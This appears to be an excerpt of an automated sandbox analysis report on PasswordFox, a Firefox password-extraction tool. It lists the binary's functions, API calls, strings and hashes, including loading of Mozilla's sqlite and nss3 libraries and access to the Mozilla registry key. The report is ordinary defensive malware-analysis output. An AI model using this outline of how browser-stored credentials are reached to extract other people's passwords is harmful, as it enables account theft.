                                        • FindClose.KERNELBASE(?,00405139), ref: 0040522F
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseFind
                                        • String ID:
                                        • API String ID: 1863332320-0
                                        • Opcode ID: 62dbfa7c63e1811810b610f1cb886171c100aa036050e138f87c146d71ab2c7b
                                        • Instruction ID: 7258cb6c5c2de48843064bd62adc787f952d3a41dfeaa26490d3244ca0220340
                                        • Opcode Fuzzy Hash: 62dbfa7c63e1811810b610f1cb886171c100aa036050e138f87c146d71ab2c7b
                                        • Instruction Fuzzy Hash: A0C048301129028AD2285B38989942A76A0AE6A3313A54BACA0F6A24E0E73884868A04
                                        Function 0040AC82 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                        Download Yara Rule
                                        APIs
                                        • EnumResourceNamesW.KERNELBASE(?,?,Function_0000ABFC,00000000), ref: 0040AC91
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: EnumNamesResource
                                        • String ID:
                                        • API String ID: 3334572018-0
                                        • Opcode ID: 93bfcdd1ce8c9a990b01fb4c0ca2e1f5febb187ec46c244e53b2309ff527f6c5
                                        • Instruction ID: bfa329344ff549f3976d3829da3fa5de4afdcd747072533c3578ed83298644ba
                                        • Opcode Fuzzy Hash: 93bfcdd1ce8c9a990b01fb4c0ca2e1f5febb187ec46c244e53b2309ff527f6c5
                                        • Instruction Fuzzy Hash: 84C09B31594341D7D7019F609C09F1B7EA5BB55701F144D397151B40E0C7719064E605
                                        Function 00404530 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(00000000,004034E5,00000000), ref: 00404534
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 8f8408d43e69368b308a6704c01702357b80f84243bd79ab395a7453a749a152
                                        • Instruction ID: 7ae30d917d45c6e88a235bfbc1a14835386c6acafc0d64a60d04f82b75f210de
                                        • Opcode Fuzzy Hash: 8f8408d43e69368b308a6704c01702357b80f84243bd79ab395a7453a749a152
                                        • Instruction Fuzzy Hash: 25B012752100108BCB0807349D9504D76509F45631730473CB033D40F0D730CC60BE01
                                        Function 0040A9BF Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040358D,80000002,SOFTWARE\Mozilla,?), ref: 0040A9D2
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Open
                                        • String ID:
                                        • API String ID: 71445658-0
                                        • Opcode ID: a4b783e269585c4318d12d0e22128fef234eba750c01504b4b2eb2178db074be
                                        • Instruction ID: 60a4af8ee6d59fea14b82fbe0a456b2e00203c604c9193f7a0d0de9fd8a5364e
                                        • Opcode Fuzzy Hash: a4b783e269585c4318d12d0e22128fef234eba750c01504b4b2eb2178db074be
                                        • Instruction Fuzzy Hash: 1DC09B35544301FFDE114F40EE45F09BB61BB84B05F104414B244340B182714414EB17
                                        Function 00404EAB Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: dee23dddffafb37f9d61bb6ea4577df9f5847839b12af649ca595ba92faed36a
                                        • Instruction ID: 71b4aa9b148329b8899b8ff98833b41d6c2de554888759dbdd4900b10c841ab3
                                        • Opcode Fuzzy Hash: dee23dddffafb37f9d61bb6ea4577df9f5847839b12af649ca595ba92faed36a
                                        • Instruction Fuzzy Hash: F9C002B29107029FE7309E15C459763B2E4EF5072BF608C1D9495914C2D77CE484CA58

                                        Non-executed Functions

                                        Function 0040B251 Relevance: 57.9, APIs: 20, Strings: 13, Instructions: 131libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040B27C
                                        • wcscpy.MSVCRT ref: 0040B293
                                        • memset.MSVCRT ref: 0040B2C6
                                        • wcscpy.MSVCRT ref: 0040B2DC
                                        • wcscat.MSVCRT ref: 0040B2ED
                                        • wcscpy.MSVCRT ref: 0040B313
                                        • wcscat.MSVCRT ref: 0040B324
                                        • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040B333
                                        • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040B34A
                                        • LoadLibraryW.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040B35D
                                        • LoadLibraryW.KERNEL32(mozsqlite3.dll,?,?,00000000), ref: 0040B36B
                                        • GetProcAddress.KERNEL32(?,sqlite3_open), ref: 0040B387
                                        • GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 0040B393
                                        • GetProcAddress.KERNEL32(?,sqlite3_step), ref: 0040B3A0
                                        • GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 0040B3AD
                                        • GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 0040B3BA
                                        • GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 0040B3C7
                                        • GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 0040B3D4
                                        • GetProcAddress.KERNEL32(?,sqlite3_close), ref: 0040B3E1
                                        • GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 0040B3EE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoadwcscpy$memsetwcscat$HandleModule
                                        • String ID: \mozsqlite3.dll$\sqlite3.dll$mozsqlite3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
                                        • API String ID: 2987540277-2598477893
                                        • Opcode ID: 1af300b62d48c8418892f8fd2c98970e6ac461ac8e5a5774a91a9b30aff54590
                                        • Instruction ID: 14b093565bb511fcdc85993d5b11a14a44a8d5736ca9221a3b6d56b508eda27a
                                        • Opcode Fuzzy Hash: 1af300b62d48c8418892f8fd2c98970e6ac461ac8e5a5774a91a9b30aff54590
                                        • Instruction Fuzzy Hash: 454142B1D40709AACB20BFB18D45E5B76E8EF48704B5009BAA549B2191E77CE644CF5C
                                        Function 004043CD Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • EmptyClipboard.USER32 ref: 004043D7
                                          • Part of subcall function 00404216: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,00403C73,?), ref: 00404228
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 004043F4
                                        • GlobalAlloc.KERNEL32(00002000,00000002), ref: 00404405
                                        • GlobalLock.KERNEL32(00000000), ref: 00404412
                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00404425
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00404437
                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00404440
                                        • GetLastError.KERNEL32 ref: 00404448
                                        • CloseHandle.KERNEL32(?), ref: 00404454
                                        • GetLastError.KERNEL32 ref: 0040445F
                                        • CloseClipboard.USER32 ref: 00404468
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                        • String ID:
                                        • API String ID: 3604893535-0
                                        • Opcode ID: b0f26e8d99f869fb1eca346a2f7d1d0832088ac3eb436f7269575a2cd43f8522
                                        • Instruction ID: 7163b0dadf5ab7e9d070504b78d8126dc1e30b2e342164c7525744df928d89dc
                                        • Opcode Fuzzy Hash: b0f26e8d99f869fb1eca346a2f7d1d0832088ac3eb436f7269575a2cd43f8522
                                        • Instruction Fuzzy Hash: D3118F76900204FBDB106BE0ED8CB5E7B78EB84356F108276F602F21A1DB708901DB69
                                        Function 00404D0E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(00000000,?,?,nss3.dll,00000000), ref: 00404D26
                                        • FindNextFileW.KERNEL32(00000000,?,?,nss3.dll,00000000), ref: 00404D45
                                        • FindClose.KERNEL32(00000000,?,nss3.dll,00000000), ref: 00404D65
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNext
                                        • String ID: .$nss3.dll
                                        • API String ID: 3541575487-2628452245
                                        • Opcode ID: a0cdd73c55fa3cba713df79608e6cb38044a559a8bfbff6296494efd44007b3f
                                        • Instruction ID: 686c77c42c0bc2d4efecc617a5b38bdf54240a75ec4f3d98de153850bc1ea0c3
                                        • Opcode Fuzzy Hash: a0cdd73c55fa3cba713df79608e6cb38044a559a8bfbff6296494efd44007b3f
                                        • Instruction Fuzzy Hash: 24F09671900528DBDB306BB49C885EBB76CEF84365F004262AE16F3190D3389D45CA98
                                        Function 0040109F Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 178COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003EC), ref: 004010F7
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401109
                                        • GetDlgItem.USER32(?,000003EE), ref: 0040113F
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 0040114C
                                        • GetDlgItem.USER32(?,000003EC), ref: 0040117A
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 0040118C
                                        • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 00401195
                                        • LoadCursorW.USER32(00000000,00000067), ref: 0040119E
                                        • SetCursor.USER32(00000000,?,?), ref: 004011A5
                                        • GetDlgItem.USER32(?,000003EE), ref: 004011C6
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 004011D3
                                        • GetDlgItem.USER32(?,000003EC), ref: 004011ED
                                        • SetBkMode.GDI32(?,00000001), ref: 004011F9
                                        • SetTextColor.GDI32(?,00C00000), ref: 00401207
                                        • GetSysColorBrush.USER32(0000000F), ref: 0040120F
                                        • GetDlgItem.USER32(?,000003EE), ref: 00401230
                                        • EndDialog.USER32(?,00000001), ref: 0040125B
                                        • DeleteObject.GDI32(?), ref: 00401267
                                        • GetDlgItem.USER32(?,000003ED), ref: 0040128C
                                        • ShowWindow.USER32(00000000), ref: 00401295
                                        • GetDlgItem.USER32(?,000003EE), ref: 004012A1
                                        • ShowWindow.USER32(00000000), ref: 004012A4
                                        • SetDlgItemTextW.USER32(?,000003EE,0040FEB0), ref: 004012B5
                                        • SetWindowTextW.USER32(?,PasswordFox), ref: 004012C3
                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004012DB
                                        • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004012EC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                        • String ID: PasswordFox
                                        • API String ID: 829165378-3917124896
                                        • Opcode ID: b7105b33d1dbb3790eedd9d337f3acede5ab556a795471879666d2ecd75b0e8f
                                        • Instruction ID: 06ddacdadf490f56c435dab6f8e1940d296525f203817ed67ceea2118fbb07a8
                                        • Opcode Fuzzy Hash: b7105b33d1dbb3790eedd9d337f3acede5ab556a795471879666d2ecd75b0e8f
                                        • Instruction Fuzzy Hash: DA517D31500209EBDB21AF61DD84E6F7BA5EB44300F10863AF655BA5F1C779A991EB08
                                        Function 00409B23 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • EndDialog.USER32(?,?), ref: 00409B68
                                        • GetDlgItem.USER32(?,000003EA), ref: 00409B80
                                        • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00409B9E
                                        • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00409BAA
                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00409BB2
                                        • memset.MSVCRT ref: 00409BD9
                                        • memset.MSVCRT ref: 00409BFB
                                        • memset.MSVCRT ref: 00409C14
                                        • memset.MSVCRT ref: 00409C28
                                        • memset.MSVCRT ref: 00409C42
                                        • memset.MSVCRT ref: 00409C57
                                        • GetCurrentProcess.KERNEL32 ref: 00409C5F
                                        • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 00409C82
                                        • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 00409CB4
                                        • memset.MSVCRT ref: 00409D07
                                        • GetCurrentProcessId.KERNEL32 ref: 00409D15
                                        • memcpy.MSVCRT(?,0040F850,0000021C), ref: 00409D43
                                        • wcscpy.MSVCRT ref: 00409D66
                                        • _snwprintf.MSVCRT ref: 00409DD5
                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 00409DED
                                        • GetDlgItem.USER32(?,000003EA), ref: 00409DF7
                                        • SetFocus.USER32(00000000), ref: 00409DFE
                                        Strings
                                        • {Unknown}, xrefs: 00409BED
                                        • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00409DCA
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                        • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                        • API String ID: 4111938811-1819279800
                                        • Opcode ID: 9fe5e13d2a84a8293e436f1e929fd82f35361d293400db2b09c83656bd87a2bf
                                        • Instruction ID: f8f143b153c59337336e0c353dbabed249341f390da81bfa93234f36905f1053
                                        • Opcode Fuzzy Hash: 9fe5e13d2a84a8293e436f1e929fd82f35361d293400db2b09c83656bd87a2bf
                                        • Instruction Fuzzy Hash: 6A7175B2800219BEDB219F61DD45EDA376DEF08354F00417AF608B61A1DB799E848FA9
                                        Function 0040A4AC Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 265COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 0040A4D9
                                        • GetDlgItem.USER32(?,000003E8), ref: 0040A4E5
                                        • GetWindowRect.USER32(00000000,?), ref: 0040A527
                                        • GetWindowRect.USER32(?,?), ref: 0040A532
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040A546
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040A554
                                        • 73A1A570.USER32(?,?,?), ref: 0040A58D
                                        • wcslen.MSVCRT ref: 0040A5CD
                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0040A5DE
                                        • _snwprintf.MSVCRT ref: 0040A6EE
                                        • SetWindowTextW.USER32(?,?), ref: 0040A702
                                        • SetWindowTextW.USER32(?,00000000), ref: 0040A720
                                        • GetDlgItem.USER32(?,00000001), ref: 0040A756
                                        • GetWindowRect.USER32(00000000,?), ref: 0040A766
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040A774
                                        • GetClientRect.USER32(?,?), ref: 0040A78B
                                        • GetWindowRect.USER32(?,?), ref: 0040A795
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0040A7DB
                                        • GetClientRect.USER32(?,?), ref: 0040A7E5
                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0040A81D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Window$Rect$ItemPointsText$Client$A570ExtentPoint32_snwprintfwcslen
                                        • String ID: %s:$EDIT$STATIC
                                        • API String ID: 842022892-3046471546
                                        • Opcode ID: f55b858b5fc177468efb40cbe2bbab40b02d23b5efcb40a195741c8900b95891
                                        • Instruction ID: 3205e7fe72936d93a5ec92f6ef6244d36d3081a5468dab2d2e65200363bb81f1
                                        • Opcode Fuzzy Hash: f55b858b5fc177468efb40cbe2bbab40b02d23b5efcb40a195741c8900b95891
                                        • Instruction Fuzzy Hash: A7B1DF72108301AFD710DFA9C984E2ABBF9FF88304F004A2DF599962A1D775E954CF16
                                        Function 0040834B Relevance: 35.3, APIs: 16, Strings: 4, Instructions: 270windowregistryclipboardCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004056C4: LoadMenuW.USER32(00000000), ref: 004056CC
                                        • SetMenu.USER32(?,00000000), ref: 0040847D
                                        • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 004084B0
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004084BF
                                        • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004084CC
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00408503
                                        • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 0040852A
                                        • GetModuleHandleW.KERNEL32(00000000,00000000,00000001), ref: 004085A4
                                        • LoadIconW.USER32(00000000,00000066), ref: 004085AD
                                        • SetFocus.USER32(?,/nosaveload), ref: 0040860B
                                        • GetFileAttributesW.KERNEL32(00410408), ref: 00408625
                                        • GetTempPathW.KERNEL32(00000104,00410408), ref: 00408635
                                        • wcslen.MSVCRT ref: 0040863C
                                        • wcslen.MSVCRT ref: 0040864A
                                        • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 00408697
                                        • SendMessageW.USER32(?,00000404,00000002,?), ref: 004086D2
                                        • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004086E5
                                          • Part of subcall function 004026DE: wcslen.MSVCRT ref: 004026FB
                                          • Part of subcall function 004026DE: SendMessageW.USER32(00000000,00001061,00000000,?), ref: 0040271F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: MessageSend$HandleLoadModulewcslen$Menu$AttributesClipboardCreateFileFocusFormatIconImagePathRegisterTempWindow
                                        • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html
                                        • API String ID: 3682063973-2103577948
                                        • Opcode ID: 2f1baa7290e0e506af1a895a6cc2592183571aeea87fd9672bedcc72a81e6651
                                        • Instruction ID: 5775a152888729de56b34ef4f4b2d27c24110eed3a33eee853d19f4e7ffcdba8
                                        • Opcode Fuzzy Hash: 2f1baa7290e0e506af1a895a6cc2592183571aeea87fd9672bedcc72a81e6651
                                        • Instruction Fuzzy Hash: 07B1CB71500288EFEB11DF68CC89BCA7FA5AF64304F040579FA48BB2D2C7B59548CB69
                                        Function 0040AF85 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wcscat$_snwprintfmemset$wcscpy
                                        • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                        • API String ID: 3143752011-1996832678
                                        • Opcode ID: 318a56d019d3aaa7f96921b2e4e0ce1dd904295b8dddfdd2e3368ec152fa45fb
